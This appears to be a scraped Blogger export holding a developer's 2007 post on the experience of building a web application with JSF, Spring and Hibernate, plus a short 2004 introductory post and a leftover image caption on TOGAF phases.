<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNCB3iFa2Z6Am2-LZ_ScAYYonVgZU5E6fR4yMoqmfVo_vNUTyMsRYN8Wp5bgQ9kB4htFYdO-laqLyBV1JCx5QtiZ5kj7Gkr-Y5avPseMCsnM-2_cxj9VN7TAEpZFr8-MlFsQMs/s1600/togaf.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNCB3iFa2Z6Am2-LZ_ScAYYonVgZU5E6fR4yMoqmfVo_vNUTyMsRYN8Wp5bgQ9kB4htFYdO-laqLyBV1JCx5QtiZ5kj7Gkr-Y5avPseMCsnM-2_cxj9VN7TAEpZFr8-MlFsQMs/s320/togaf.png" width="250" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><b>TOGAF Phases</b></td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br /></div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-9235625.post-41390135366369083562007-10-19T07:42:00.000-07:002010-12-22T01:29:49.901-08:00JSF, Spring & Hibernate - Light weight ArchitectureRecently I have finished one assignment on J2EE technology and it was the good experiences.<br /><br />Project was typical web-based with database driven. After studying the application I decided to use JSF in front end, spring in middle and hibernate for interacting with database.<br />Though I haven't worked on JSF & Spring prior to this project and my team was also new but I took the challenge also.<br /><br />I decided for JSF because the client wants rich GUI. As soon as we started and get into the project I realized that learning curve of JSF is very high. At that time team was struggling very hard to get hold of it. And the result was we delivered first module 10 days after the deadline.<br /><br />As time passes, we got the hold of JSF and delivered the all the modules on/before time. We had used various in-build components available on net which actually saved most of our time.<br />We had also met the performance benchmark of client.<br /><br />So what I feel for small & middle level projects you can use "JSF-Spring-Hibernate" because:<br />1. You will get good in build components in JSF<br />2. Spring helps you in wring objects and it has a good feature of AOP<br />3. Hibernate is a good ORM tool with lots of feature.<br /><br />Apart from good learning on "JSF-Spring-Hibernate" framework I also learned that you should also keep in mind while deciding on tools/frameworks that how is team and what is the time frame.<br /><br />So guys try to use "JSF-Spring-Hibernate" framework and share your experiences.Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-9235625.post-1100867299739927832004-11-19T04:18:00.000-08:002004-12-10T03:05:38.213-08:00Kick start....!!<span style="font-family:georgia;">Been a Software Engineer, I used to search most of the things into the Net and my friend <a href="http://abhinavmaheshwari.blogspot.com/">Abhinav</a> also have blogger and it helps me a lot...... thanks Abhi!!!.
<br />
<br />so finally I decided to have the blog so that I can help someone or share some good information on technology front.
<br />
<br />
<br /></span>Unknownnoreply@blogger.com0